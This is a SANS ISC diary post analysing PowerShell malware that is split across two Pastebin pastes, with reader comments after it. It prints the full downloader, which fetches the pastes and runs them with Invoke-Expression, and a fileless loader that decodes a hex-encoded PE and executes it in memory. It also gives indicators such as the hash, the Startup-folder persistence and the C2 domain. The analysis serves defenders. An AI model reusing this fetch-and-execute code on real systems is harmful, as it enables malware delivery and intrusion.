Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Divided Payload in Multiple Pasties - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Divided Payload in Multiple Pasties

In politic, there is a strategy which says “divide and conquer”. It’s also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of Powershell code found on Pastebin that applies exactly this technique. Thanks to him!

Here is the complete Powershell command line (beautified for easy read)

powershell.exe -command 
$request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF’);
$request.Method="Get”;
$response = $request.GetResponse();
$requestStream = $response.GetResponseStream();
$readStream = New-Object System.IO.StreamReader $requestStream;
$data=$readStream.ReadToEnd();
$rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA’);
$rrequest.Method="Get”;
$rresponse = $rrequest.GetResponse();
$rrequestStream = $rresponse.GetResponseStream();
$rreadStream = New-Object System.IO.StreamReader $rrequestStream;
$ddata=$rreadStream.ReadToEnd();
iex($data+$ddata)

The code is pretty easy to understand: It grabs the content of 2 pasties from pastebin.com, concatenates them and executes them through iex(), an alias for Invoke-Expression(). So, we can expect these pasties to contain more Powershell code.

Indeed, here is the content of the concatenated data:

function HexToBin([string]$s) {
  $return = @()
  for ($i = 0; $i -lt $s.Length ; $i += 2)
  {
    $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
  }
  Write-Output $return
}
$Str = ‘4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000
000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E2044
4F53206D6F64652E0D0D0A2400000000000000504500004C0103004050B35B0000000000000000E00002010B010800007E0100000A0000000
00000CE9C010000200000000000000000400000200000000200000400000000000000040000000000000000E0010000020000000000000200
40850000100000100000000010000010000000000000100000000000000000000000789C01005300000000A00100000800000000000000000
000000000000000000000C001000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000D47C01000020000
[stuff deleted]
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009001000C000000D
03C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000';
$Str = $Str.replace("0","0");
[byte[]]$Data = HexToBin($str);
$asm = [System.Reflection.Assembly]::Load($Data);
$asm.EntryPoint.invoke($null,$null);
write-host "Can you help me";
[void][System.Console]::ReadKey($true);

This piece of code decodes the hex-encoded $str variable into $data using the HexToBin() function and executes it. You can see the beginning of the string ‘0x4D 0x5A 0x90’ which indicates that it’s a PE file. The way it is executed is interesting. It uses the System.Reflection.Assembly[1] class to load the code and execute it from memory (file less Powershell)

The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday but today it was uploaded from Denmark and reached already a score of 24/63[2]. It adds persistence by creating a .lnk file into %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pointing to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) via HTTPS.

Happy Thanksgiving!

[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2
[2] https://www.virustotal.com/#/file/30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

 Xme

458 Posts
ISC Handler
Subscribe Nov 22nd 2018
6 months ago
And NOW I'm hungry, with all this talk of pasties!

https://en.wikipedia.org/wiki/Pasty
 Anonymous
Quote Nov 22nd 2018
6 months ago
X - very interesting article. But all that is just secondary to your use of the term "pasties". Translated from British, its a pastry. BUT the most overwhelmingly common :'-) use is <rotfl> "nipple covers" 8-D. <lmao>. I suppose that you saw a huge spike in hits that day. :-O
 Brett

17 Posts
Quote Nov 28th 2018
6 months ago

Sign Up for Free or Log In to start participating in the conversation!